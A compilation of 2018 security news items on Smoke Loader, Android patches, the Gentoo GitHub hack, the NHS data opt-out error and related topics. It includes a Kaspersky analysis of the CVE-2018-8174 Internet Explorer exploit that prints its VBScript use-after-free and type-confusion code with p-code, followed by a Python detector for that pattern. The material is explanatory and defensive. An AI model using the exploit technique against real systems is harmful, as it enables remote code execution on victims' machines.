The new release also fixes a use-after-free flaw tracked as CVE-2018-12360 that could be exploited to crash a target system.

“A use-after-free vulnerability can occur when deleting an input element during a mutation event handler triggered by focusing that element. This results in a potentially exploitable crash.” continues the advisory.

Another security issue concerns executable SettingContent-ms files: security researcher Matt Nelson discovered that Windows 10 users were not warned when opening this kind of file. The issue, tracked as CVE-2018-12368, could be used by attackers to execute arbitrary code by tricking users into opening such files.

“Windows 10 does not warn users before opening executable files with the SettingContent-ms extension even when they have been downloaded from the internet and have the “Mark of the Web.” continues the advisory.

“Without the warning, unsuspecting users unfamiliar with this new file type might run an unwanted executable. This also allows a WebExtension with the limited downloads.open permission to execute arbitrary code without user interaction on Windows 10 systems”.

Thunderbird also addressed some memory safety bugs inherited from the Firefox code base.

The good news is that these bugs could not be directly exploited in the e-mail client, because scripting is disabled while users are reading messages.


New Smoke Loader campaign aims at stealing multiple credentials from many applications
6.7.2018 securityaffairs Virus

Recently experts from Talos security spotted a malware campaign leveraging Smoke Loader to steal credentials from a broad range of applications.

Security experts have discovered a new malware campaign leveraging Smoke Loader to steal credentials from web browsers, email clients, and other popular applications.

The attack chain starts with messages carrying a weaponized Word document as an attachment; the hackers attempt to trick victims into opening it and enabling the embedded macro.

Once executed, the macro downloads the TrickBot banking Trojan that in this campaign is used to fetch the Smoke Loader backdoor.

Smoke Loader is a tiny dropper normally used to install other malware families on the infected system, but in this specific campaign the experts observed an inversion of roles, with TrickBot downloading it.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader.” reads the analysis published by Talos.

“This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers.”

While malware frequently iterates through process lists to find a process to inject into, this new backdoor variant calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe.

The malware also uses the PROPagate technique to inject code into Explorer, the same technique recently implemented by RIG Exploit Kit operators to deliver cryptocurrency miners.

The malware also implements several anti-analysis techniques, including anti-debugging and anti-VM checks, and it inspects running threads, processes and windows looking for ones that belong to analysis tools.

The Smoke Loader variant used in this campaign was receiving five plugins, each of which was executed in its own Explorer.exe process.

The plugins were designed to steal sensitive information from the infected machine, targeting stored credentials and sensitive data managed by the web browser.

“In our Trickbot cases, the malware finally downloaded the Smoke Loader trojan, which installed five additional Smoke Loader plugins.” continues the analysis.

The first plugin implements roughly 2,000 functions and it is able to target a broad range of applications, including Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird, to steal hostname and credentials. This plugin also attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.

The second plugin recursively searches through directories looking for files to parse and exfiltrate.

The third plugin injects into browsers to intercept credentials and cookies as they are transferred over HTTP and HTTPS, while the fourth hooks ws2_32!send and ws2_32!WSASend to attempt to steal credentials for ftp, smtp, pop3, and imap.

The fifth plugin injects code into TeamViewer.exe to steal credentials.

“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools.” concludes the analysis.

“This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.


CipherTrace Unveils Crypto-Currency Anti-Money Laundering Solution
5.7.2018 securityweek  Cryptocurrency

Cryptocurrency theft, and the use of cryptocurrency to launder the proceeds of other illegal activity, are booming. This has prompted the evolution of a related industry that sits on the borderline of legality (barely legal in some jurisdictions, illegal in others): cryptocurrency money laundering. The laundering of illegally-obtained money may be illegal, but the process used may not be.

CoinMixer is one such service that is advertised on Google Search. It says of its service, "Generally there is no link between the original transactions and the final address of the coins. This process protects your privacy and prevents other people tracing your payments on the internet." While this process can help with possibly legitimate privacy concerns, it is precisely what is required for money laundering.

Menlo Park, Calif. startup CipherTrace is a firm founded on the need for cryptocurrency anti-money laundering (AML), blockchain forensics and enforcement solutions. It aids law enforcement and financial regulators in their investigations, helps enterprises to deploy real-world cryptocurrency transactional systems within regulations, and offers a bitcoin scam and theft asset recovery service.

The CipherTrace Cryptocurrency Anti-Money Laundering Report for Q2, 2018 (PDF) shows the size of the problem; and highlights some of the regulatory discussions happening at international levels. Stolen cryptocurrency alone reached more than $750 million in the first half of 2018 -- which is already nearly three times the amount stolen in 2017. The report also adds, "The FBI noted that the value of virtual currencies contained in the Internet Crime Center 2017 reports were $58.3M, citing cyber actor demands of ransom payments, typically in virtual currency such as Bitcoin."

All this currency needs to be laundered before it can be safely accessed by the criminals. This is typically done through sites offering mixers, tumblers and chain hopping services. "The more dirty crypto money that goes into the systems and the more it moves around, the harder it becomes for investigators to see through the web of action and trace a path back to the source."

Governments and law enforcement agencies are not ignoring the use of cryptocurrencies to launder illegal gains. At the 5th Annual Europol Virtual Currency Conference, which was held at the Hague in the Netherlands, Jamal El-Hindi of the U.S. Financial Crimes Enforcement Network (FinCEN) reiterated FinCEN's position. "We will hold accountable foreign-located money transmitters, including virtual currency exchangers, that do business in the United States when they willfully violate U.S. AML laws."

The cryptocurrency theft problem that fosters the cryptocurrency laundering industry shows no sign of slowing down. It ranges from the theft of individual wallets, the use of various cryptocurrencies within ransomware extortion, and major thefts from large cryptocurrency exchanges.

"Cybercriminals follow easy money," comments High-Tech Bridge CEO Ilia Kolochenko, "and many cryptocurrency owners are the perfect victims. They are virtually unable to protect either themselves or their digital assets, being susceptible even to relatively simple phishing attacks. Law enforcement is frequently uninterested in investigating and prosecuting petty offences with digital coins theft, as they are already under water with highly-sophisticated nationwide hacks."

He points out that cryptocurrency startups are often ignorant of the fundamentals of cybersecurity, and devote all their efforts and resources to survival in an extremely volatile and highly-competitive market.

"We can almost certainly expect further proliferation of security incidents related to crypto currencies. Attackers have now established impressive infrastructure purposely tailored for large-scale theft and scams with digital coins. Owners of the crypto assets should remain extremely vigilant, maintain all their devices and installed software up-to-date, install at least a free antivirus from a reputable vendor, use two-factor authentication and unique passwords, and never entrust their wallets to any third-parties unless they have a very good reason to utterly trust them."

F-Secure security advisor Sean Sullivan has advocated for a form of 'Know Your Customer' regulation to be applied to cryptocurrency exchanges. "Bitcoin exchange accounts could be required to be tied to a physical address," Sullivan said. Currently it takes just minutes -- or seconds -- to open a Bitcoin account in a third-party market. This would require an activation code that's mailed to you before an account can be opened. While this wouldn't affect criminals who do business out of Russia and China, it would make their attacks far less profitable; and would make the tracking of illegally acquired cryptocurrency by law enforcement considerably easier.

"The exchanges would hate it. But given the hundreds of millions of dollars being extorted every few months, it seems appropriate," Sullivan says. "Barring this or a similar step, exponential growth of malware families delivering these threats seems to be the only other option."


NHS Digital Erroneously Reveals Data of 150,000 Patients
5.7.2018 securityweek BigBrothers

On Monday July 2, Jackie Doyle-Price, the parliamentary under-secretary of state for health, delivered a written statement to the UK parliament. It explained that 150,000 NHS patients who had specifically opted out of the NHS patient data-sharing regime were in fact not opted out.

"As a result," says the statement, "these objections were not upheld by NHS Digital in its data disseminations between April 2016, when the NHS Digital process for enabling them to be upheld was introduced, and 26 June 2018. This means that data for these patients has been used in clinical audit and research that helps drive improvements in outcomes for patients."

NHS Digital is the national information and technology partner to the health and social care system. It has responsibility for standardizing, collecting and publishing data and information from across the health and social care system in England. It is therefore responsible for storing and disseminating NHS patient data to those qualified to receive it.

On the same day, NHS Digital released its own statement. "We apologize unreservedly for this issue, which has been caused by a coding error by a GP system supplier (TPP) and means that some people's data preferences have not been upheld when we have disseminated data. The TPP coding error meant that we did not receive these preferences and so have not been able to apply them to our data."

It seems that a software error in an application named SystmOne, written by software firm TPP and designed to allow patients to opt out of data sharing at their local NHS surgery, failed to record the objections. Those objections were therefore not relayed to NHS Digital. Since the system relies on patients opting out rather than opting in to data sharing, NHS Digital assumed that all patients had agreed.

The software error was detected on 28 June, three years after SystmOne was released, when TPP switched to a new system. Neither Jackie Doyle-Price nor NHS Digital has given figures on how many times this data might have been erroneously shared externally during this period. However, NHS Digital compiles and publishes a register of organizations that receive patient data. The most recent publication (XLS) covers the period from December 2017 to February 2018. It shows that patient data was shared more than 5,300 times in these three months.

It also shows where the data shared is considered to be sensitive or non-sensitive, and whether the data was anonymized or is identifiable. The anonymization is performed in accordance with the UK data protection regulator's requirements; but many privacy activists do not believe that anonymization is irreversible.

"As part of our commitment to the secure and safe handling of health data, on 25 May 2018 [the date on which GDPR became required] the Government introduced the new national data opt-out. The national data opt-out replaces Type 2 objections. This has simplified the process of registering an objection to data sharing for uses beyond an individual's care. The new arrangements give patients direct control over setting their own preferences for the secondary use of their data and do not require the use of GP systems, and therefore will prevent a repeat of this kind of GP systems failure in the future."

It remains an opt-out of data sharing rather than an opt-in to data sharing -- the latter being generally required by GDPR.

Dr John Parry, Clinical Director at TPP, said: "TPP and NHS Digital have worked together to resolve this problem swiftly. The privacy of patient data is a key priority for TPP, and we continually make improvements to our system to ensure that patients have optimum control over information. In light of this, TPP apologizes unreservedly for its role in this issue."

NHS Digital added, "We are confident that we are now respecting all opt-outs that have been recorded in the system. We will also be contacting organizations with whom we have shared data that may have been affected, and work with them to destroy the data where possible."

In an emailed comment, Mike Smart, a security strategist at Forcepoint, told SecurityWeek, "In this case, it appears the underlying program left patient data exposed, even though each party involved in handling the data was aware of the privacy policy settings. It's a clear indicator that relying too heavily on software will cause these mistakes to happen in the future. We can't afford to leave out the human element when deciding how we protect sensitive data, and must involve creative and lateral thinking in the testing and final checking stage before software goes live."


Google Fixes Critical Android Vulnerabilities
5.7.2018 securityweek Vulnerability

Google this week released its July 2018 set of Android patches to address tens of vulnerabilities in the mobile operating system, including several rated as Critical.

The Internet giant addressed 11 vulnerabilities as part of the 2018-07-01 security patch level, including three rated Critical and eight rated High risk. The issues impact framework, media framework, and system.

All three Critical severity bugs are remote code execution flaws, one for each of the impacted components. The remaining vulnerabilities include information disclosure bugs, elevation of privilege issues, and denial of service flaws.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes in an advisory.

Affected operating system versions include Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.

A total of 32 flaws were addressed as part of the 2018-07-05 security patch level, 8 rated Critical severity and 24 considered High risk.

These issues impact Kernel, Qualcomm, and Qualcomm closed-source components such as IPV6 stack, futex, USB driver, WLAN, nsfs, OpenGL ES driver, and ADSPRPC heap manager.

Of the resolved vulnerabilities, 22 were impacting Qualcomm closed-source components. These include 7 Critical issues and 15 High risk flaws.

Six vulnerabilities were addressed in Qualcomm components, including a Critical remote code execution flaw, one High severity remote code execution bug, two High risk information disclosure issues, and two elevation of privilege vulnerabilities.

All four flaws addressed in Kernel components were elevation of privilege bugs.

This month, Google also addressed 26 Medium severity issues impacting Pixel and Nexus devices. Affected components include framework, media framework, system, Kernel components, and Qualcomm components.

Most of the addressed issues were elevation of privilege bugs, but remote code execution and information disclosure security vulnerabilities were also addressed.

Additionally, the Internet giant released a functional update for the Pixel and Nexus devices, to “improve consistency of Wi-Fi connections with certain routers,” the advisory reads.

Last month, Google addressed a dozen Critical flaws in Android, along with tens of High risk issues. The company also resolved over 60 vulnerabilities affecting Pixel and Nexus devices, most of which were rated Medium severity.


New Smoke Loader Attack Targets Multiple Credentials
5.7.2018 securityweek Virus

A recently detected Smoke Loader infection campaign is attempting to steal credentials from a broad range of applications, including web browsers, email clients, and more.

The attacks begin with malicious emails carrying a Word document as an attachment. Using social engineering, the attackers attempt to lure victims into opening the document and executing an embedded macro.

Once executed, the macro initiates a second stage and downloads the TrickBot malware, which in turn fetches the Smoke Loader backdoor, Cisco Talos reports.

Smoke Loader has long been used as a downloader for various malware families, including banking Trojans, ransomware, and crypto-currency miners. In some previous campaigns it was also used as a dropper for TrickBot, but it appears the tables have now turned.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,” Talos says.

The new backdoor variant, the security researchers reveal, doesn’t iterate through process lists to find a process to inject code into, but calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe. It also uses the PROPagate technique to inject code into Explorer.

First described in late 2017, the method had not been adopted by any other malware, and no public Proof-of-Concept (PoC) has been published to date. Smoke Loader is the first to use the technique, as FireEye also reported last week.

The malware also includes a series of anti-analysis techniques, along with anti-debugging and anti-VM checks.

Unlike previous attacks, where Smoke Loader would drop additional payloads, the backdoor was observed receiving five plugins instead. Each plugin was executed in its own Explorer.exe process, but older techniques were used to inject each plugin into those processes. The attack ultimately results in six Explorer.exe processes running on the infected machine.

All of the plugins were designed to steal sensitive information from the victim machine and explicitly target stored credentials and sensitive information transferred over a browser.

The first plugin contains around 2,000 functions and targets Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird to steal hostname, username, and password data. Additionally, it attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.

The second plugin searches through directories for files to parse and exfiltrate. The third plugin injects into browsers to intercept credentials and cookies, the fourth attempts to steal credentials for ftp, smtp, pop3, and imap, while the fifth injects code into TeamViewer.exe for credential theft.

“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.


Delving deep into VBScript

5.7.2018 Kaspersky Vulnerability
Analysis of CVE-2018-8174 exploitation
In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.

But whereas CVE-2014-6332 was aimed at integer overflow exploitation for writing to arbitrary memory locations, my interest lay in how this technique was adapted to exploit the use-after-free vulnerability. To answer this question, let’s consider the internal structure of the VBScript interpreter.

Undocumented platform
Debugging a VBScript executable is a tedious task. Before the script is executed, it is compiled into p-code, which is then interpreted by the virtual machine. There is no open source information about the internal structure of this virtual machine and its instructions. It took me a lot of effort to track down a couple of web pages with Microsoft engineer reports dated 1999 and 2004 that shed some light on the p-code. There was enough information there for me to fully reverse-engineer all the VM instructions and write a disassembler! The final scripts for disassembling VBScript p-code in the memory of the IDA Pro and WinDBG debuggers are available in our Github repository.

With an understanding of the interpreted code, we can precisely monitor the execution of the script: we have full information about where the code is being executed at any given moment, and we can observe all objects that are created and referenced by the script. All this greatly assists in the analysis.

The best place to run the disassembling script is the CScriptRuntime::RunNoEH function, which directly interprets the p-code.

Important fields in the CScriptRuntime class

The CScriptRuntime class contains all information about the state of the interpreter: local variables, function arguments, pointers to the top of the stack and the current instruction, plus the address of the compiled script.

The VBScript virtual machine is stack-oriented and consists of slightly more than 100 instructions.

All variables (local arguments and ones on the stack) are represented as a VARIANT structure occupying 16 bytes, where the upper word indicates the data type. Some of the type values are given on the relevant MSDN page.

CVE-2018-8174 exploitation
Below is the code and disassembled p-code of class ‘Class1’:

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class

Function 34 (‘Class1’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass
0005 OP_FnBindEx ‘p’ 35 FALSE
000F OP_FnBindEx ‘SetProp’ 36 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 35 (‘p’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8252,8264)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
Function 36 (‘SetProp’) [max stack = 1]:
arg count = 1
arg -1 = ref Variant ‘value’
lcl count = 0
Pcode:
***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr -1
0005 OP_NamedSt ‘mem’
***BOS(8304,8315)*** SetProp=(0) *****
000A OP_Bos1 1
000C OP_IntConst 0
000E OP_LocalSt 0
***BOS(8317,8329)*** End Function *****
0011 OP_Bos1 2
0013 OP_FnReturn
0014 OP_Bos0
0015 OP_FuncEnd

Function 34 is a constructor of class ‘Class1’.

The OP_CreateClass instruction calls the VBScriptClass::Create function to create a VBScriptClass object.

The OP_FnBindEx and OP_CreateVar instructions try to fetch the variables passed in the arguments, and since they do not yet exist, they are created by the VBScriptClass::CreateVar function.

This diagram shows how variables can be fetched from a VBScriptClass object. The value of the variable is stored in the VVAL structure:

To understand the exploitation, it is important to know how variables are represented in the VBScriptClass structure.

When the OP_NamedSt ‘mem’ instruction is executed in function 36 (‘SetProp’), it calls the Default Property Getter of the instance of the class that was previously stacked and then stores the returned value in the variable ‘mem’.

***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr -1 <-------- put argument on stack
0005 OP_NamedSt ‘mem’ <-------- if it's a class dispatcher with Default Property Getter, call it and store the returned value in mem

Below is the code and disassembled p-code of function 30 (p), which is called during execution of the OP_NamedSt instruction:

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl(“174088534690791e-324”)
For IIIl=0 To 6
IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
Set IIIlI(IIIl)=llII
Next
End Property
End Class

Function 30 (‘p’) [max stack = 3]:
arg count = 0
lcl count = 1
lcl 1 = Variant ‘llII’
tmp count = 4
Pcode:
***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0
***BOS(8763,8782)*** For IIIl=(0) To (6) *****
0011 OP_Bos1 1
0013 OP_IntConst 0
0015 OP_IntConst 6
0017 OP_IntConst 1
0019 OP_ForInitNamed ‘IIIl’ 5 4
0022 OP_JccFalse 0047
***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
0027 OP_Bos1 2
0029 OP_IntConst 0
002B OP_NamedAdr ‘IIIl’
0030 OP_CallNmdSt ‘IIIlI’ 1
***BOS(8826,8830)*** Next *****
0037 OP_Bos1 3
0039 OP_ForNextNamed ‘IIIl’ 5 4
0042 OP_JccTrue 0027
***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1
***BOS(8876,8891)*** llII.mem=lIlIIl *****
0051 OP_Bos1 5
0053 OP_NamedAdr ‘lIlIIl’
0058 OP_LocalAdr 1
005B OP_MemSt ‘mem’
….

The first basic block of this function is:

***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0

This block converts the string ‘174088534690791e-324’ to a VARIANT of type Double and stores it in local variable 0, which is reserved for the return value of the function.

VARIANT obtained after converting ‘174088534690791e-324’ to double

After the return value is set but before it is returned, this function performs:

For IIIl=0 To 6
IIIlI(IIIl)=0
Next

This calls the garbage collector for the ‘Class1’ instance and results in a dangling pointer reference due to the use-after-free vulnerability in Class_Terminate() that we discussed earlier.

In the line

***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1

the OP_InitClass ‘Class2’ instruction creates an “evil twin” instance of class ‘Class1’ at the location of the previously freed VBScriptClass, which is still referenced by the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’).

Class ‘Class2’ is the “evil twin” of class ‘Class1’:

Class Class2
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class

Function 31 (‘Class2’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass ‘Class2’
0005 OP_FnBindEx ‘P0123456789’ 32 FALSE
000F OP_FnBindEx ‘SPP’ 33 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 32 (‘P0123456789’) [max stack = 2]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
0000 OP_Bos1 0
0002 OP_NamedAdr ‘IlII’
0007 OP_IntConst 8
0009 OP_Add
000A OP_CallNmdAdr ‘mem’ 1
0011 OP_CallNmdAdr ‘LenB’ 1
0018 OP_LocalSt 0
***BOS(8423,8435)*** End Function *****
001B OP_Bos1 1
001D OP_FnReturn
001E OP_Bos0
001F OP_FuncEnd
Function 33 (‘SPP’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8451,8463)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd

The location of variables in memory is predictable. The amount of data occupied by the VVAL structure is calculated using the formula 0x32 + the length of the variable name in UTF-16.

Below is a diagram that shows the location of ‘Class1’ variables relative to ‘Class2’ variables when ‘Class2’ is allocated in place of ‘Class1’.

When execution of the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’) is complete, the value returned by function 30 (‘p’) is written to memory through the dangling pointer of VVAL ‘mem’ in Class1, overwriting the VARIANT type of VVAL ‘mem’ in Class2.

VARIANT of type Double overwrites the VARIANT type from String to Array

Thus, an object of type String is converted to an object of type Array, and data that was previously considered to be a string is treated as an Array control structure, allowing access to be gained to the entire address space of the process.
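As an added illustration (not code from the Kaspersky article), the following Python decodes the CDbl constant quoted above into the 16-byte VARIANT it produces and shows which 16-bit word of the double spells VT_ARRAY|VT_VARIANT (0x2000|0x000C = 0x200C), the tag that turns the String into an Array once it lands on Class2's ‘mem’. The exact overlap offset comes from the article's diagram, which is not reproduced here, so the scanner only reports where inside the Double VARIANT the tag sits; the SAMPLE script is constructed for the demonstration and the VARTYPE values are the public OLE Automation constants.

```python
import re
import struct

# VARTYPE tags from the OLE Automation VARIANT definition (wtypes.h).
VT_I2, VT_I4, VT_R8, VT_BSTR, VT_VARIANT, VT_UI1 = 0x2, 0x3, 0x5, 0x8, 0xC, 0x11
VT_ARRAY = 0x2000                  # "this VARIANT holds a SAFEARRAY of <base type>"
BASE_TYPES = {VT_I2, VT_I4, VT_R8, VT_BSTR, VT_VARIANT, VT_UI1}
VALUE_OFFSET = 8                   # WORD vt + three reserved WORDs precede the value


def double_variant_bytes(literal):
    """The 16-byte VARIANT that CDbl(literal) leaves in local 0: vt = VT_R8,
    reserved words zero, then the IEEE-754 double, all little-endian."""
    value = float(literal)         # correctly rounded like CDbl; denormals are fine
    return struct.pack("<HHHHd", VT_R8, 0, 0, 0, value)


def embedded_vartype(literal):
    """If some 16-bit word of the double's value bytes spells an array VARTYPE,
    return (offset of that word inside the VARIANT, vt); otherwise None."""
    var = double_variant_bytes(literal)
    for off in range(VALUE_OFFSET, len(var) - 1, 2):
        (word,) = struct.unpack_from("<H", var, off)
        if word & VT_ARRAY and (word & 0x0FFF) in BASE_TYPES:
            return off, word
    return None


# CDbl("...") with a numeric literal; also accepts the curly quotes that
# scripts copied out of web pages often carry.
CDBL_LITERAL = re.compile(
    r'CDbl\s*\(\s*["\u201c]([0-9.]+(?:e-?\d+)?)["\u201d]\s*\)', re.IGNORECASE)


def scan_vbscript(source):
    """Report every CDbl literal whose double hides an array VARTYPE word:
    the type-confusion constant pattern used by the CVE-2018-8174 exploit."""
    hits = []
    for match in CDBL_LITERAL.finditer(source):
        literal = match.group(1)
        found = embedded_vartype(literal)
        if found is not None:
            hits.append((literal, found[0], found[1]))
    return hits


# Constructed sample: the getter quoted above, plus a harmless CDbl for contrast.
SAMPLE = '''
Class lllIIl
Public Default Property Get P
P=CDbl("174088534690791e-324")
End Property
End Class
ratio = CDbl("1.5")
'''

if __name__ == "__main__":
    for literal, offset, vt in scan_vbscript(SAMPLE):
        print(f'CDbl("{literal}") -> VARIANT bytes {double_variant_bytes(literal).hex()}')
        print(f"  word at offset {offset} = 0x{vt:04X} = VT_ARRAY|0x{vt & 0x0FFF:X}")
```

Run against the sample, only the denormal literal is flagged: its double is 0x0000200C00000000, so the word at VARIANT offset 12 reads 0x200C while CDbl("1.5") carries no such tag.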

Conclusion
Our scripts for disassembling VBScript compiled into p-code enable VBScript debugging at the bytecode level, which helps to analyze exploits and understand how VBScript operates. They are available in our Github repository.

The case of CVE-2018-8174 demonstrates that when memory allocations are highly predictable, use-after-free vulnerabilities are easy to exploit. The in-the-wild exploit targets older versions of Windows. The location of objects in memory required for its exploitation is most likely to occur in Windows 7 and Windows 8.1.

Automatic Exploit Protection (AEP), part of Kaspersky Lab products, blocks all stages of the exploit with the following verdicts:

HEUR:Exploit.MSOffice.Generic
HEUR:Exploit.Script.CVE-2018-8174.a
HEUR:Exploit.Script.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic


Gentoo Publishes Incident Report After GitHub Hack

5.7.2018 securityweek Hacking

Gentoo GitHub account hacked

Maintainers of the Gentoo Linux distribution published an incident report on Wednesday after someone hijacked one of the organization’s GitHub accounts and planted malicious code.

The attack started on June 28 and the hacker (or hackers) not only changed content in compromised repositories, but also locked out Gentoo developers from the targeted GitHub account. This made the attack “loud” – Gentoo believes the hackers could have maintained access longer had they been quieter.

GitHub could not be used by Gentoo for a total of five days as a result of the incident. The breach also led to a disruption of the Gentoo Proxy Maintainers Project as it uses GitHub to submit pull requests, and all past pull requests were disconnected from their original commits.

The attacker also attempted to wipe users’ files by adding “rm -rf” to some repositories, but Gentoo believes this method was unlikely to work due to “various technical guards.”

The GitHub account was compromised after the hacker gained access to an admin account that had a predictable password.

“Evidence collected suggests a password scheme where disclosure on one site made it easy to guess passwords for unrelated webpages,” Gentoo wrote in its incident report.

The incident report summarizes the lessons learned by Gentoo following the incident and the actions taken or planned in response. These actions include making frequent backups, requiring the use of two-factor authentication (2FA) and introducing support for hardware-based 2FA, reducing the number of users with elevated privileges, auditing logins, publishing password policies, and suggesting the use of password managers.

Gentoo is also working on an incident response plan, particularly for sharing information about a security incident with users.

The maintainers of the Linux distribution believe the breach has been contained and have restored the affected GitHub page.


Facebook Responding to US Regulators in Data Breach Probe

5.7.2018 securityweek  Social

Facebook acknowledged Tuesday it was facing multiple inquiries from US and British regulators about the major Cambridge Analytica user data scandal.

The leading social network offered no details but its admission confirmed reports of a widening investigation into the misuse of private data by Facebook and its partners.

"We are cooperating with officials in the US, UK and beyond," a Facebook spokesman said in response to an AFP query.

"We've provided public testimony, answered questions, and pledged to continue our assistance as their work continues."

The Washington Post reported that the Securities and Exchange Commission, Federal Trade Commission and FBI as well as the Justice Department are looking into the massive breach of users' personal data and how the company handled it.

Facebook shares closed the shortened Nasdaq trading day down 2.35 percent to $192.73, heading into an Independence Day holiday with investors mulling what effect the investigations may have on the California-based internet giant.

Facebook has admitted that up to 87 million users may have had their data hijacked by British consultancy Cambridge Analytica, which worked for US President Donald Trump during his 2016 campaign.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg said at a hearing in Brussels that it became clear in the last two years that Facebook executives didn't do enough to prevent the platform "from being used for harm."

Zuckerberg was grilled about the breach in US Congress in April.

It remains unclear what if any penalties Facebook may face from the latest requests but the tech giant is legally bound to comply with a 2011 consent decree with the FTC on protecting private user data.

Any SEC inquiry could look at whether Facebook adequately disclosed key information to investors.


Why Banning Risks to Cybersecurity Doesn’t Actually Improve Cybersecurity

5.7.2018 securityaffairs Cyber

There’s a prevailing mindset that suggests if organizations ban all the things that pose risks to overall cybersecurity, they’re taking the most effective approach to make their organizations secure.
Initially, that line of thinking seems sensible in some regards. After all, if the aspects that threaten cybersecurity aren’t allowed at all, the problems they pose could never crop up.

But, that belief is far too simplistic. Other interventions must occur to make cybersecurity a priority, whether it’s for specific websites or entire establishments.

1. Bans Could Limit or Prevent Access to Technology
Officials associated with the U.S. government are aiming to block Huawei components from entering the country’s marketplace if they’re used on communications equipment. The argument is that those parts compromise the nation’s security.

But, it’s a short-sighted approach since all the nation’s telecommunications providers already depend on equipment from Chinese manufacturers. Instituting a ban on Huawei goods could prevent companies from getting federal funding that increases access to technology in communities with limited internet access.

Moreover, the economical prices associated with Huawei equipment make the items fit the budgets of small carriers that cannot afford pricier goods. If telecommunications providers no longer have the option to buy and use Huawei merchandise, the households and businesses in rural areas may have no means for getting internet access.

Instead of focusing on individual companies and prohibiting those from selling goods to companies in the U.S., it’s preferable for the country to develop a comprehensive national security strategy that’s not brand dependent.

2. Existing Cybersecurity Plans Generally Fall Short
A report from the U.S. State Department warned that it’s still easy to find cybersecurity vulnerabilities at public and private organizations despite increased investments meant to protect the respective networks.

A plan that only involves banning specific software titles or manufacturers isn’t robust enough because it’s not all-encompassing. Instead, organizations need to carry out intensive security audits and identify all the weak points in the networks and proactively try to minimize them.

In many cases, they can do this by implementing some of the most promising technological strategies. For example, context-based authentication and authorization use analytic data to calculate a risk score that determines whether to grant, deny or challenge a person’s access attempts.

Plus, if organizations attempt to ban software on workplace computers, that step might not be sufficient because so many people use mobile devices and apps to access workplace content from home, and their employers likely don’t know it’s happening.

3. Risks Are Not Always Apparent
It could take weeks or even months before organizations realize certain kinds of software may be detrimental to their overall cybersecurity strategies. That’s especially true because such findings are often discovered by diligent independent researchers who sound the alarm for the benefit of the public.

The Amazon Echo is one example of a gadget with software that’s had some gaping holes. In one instance, researchers illuminated an issue that could allow hackers to listen to, transcribe and transmit things people said after they used an Alexa skill that seemed legitimate.

Amazon quickly responded to the incident and fixed the problem. However, this case study proves it’s not always possible to tell whether software is risky or safe. People use Alexa daily without problems, but that doesn’t mean the software is trouble-free, nor that companies should rush to ban it.

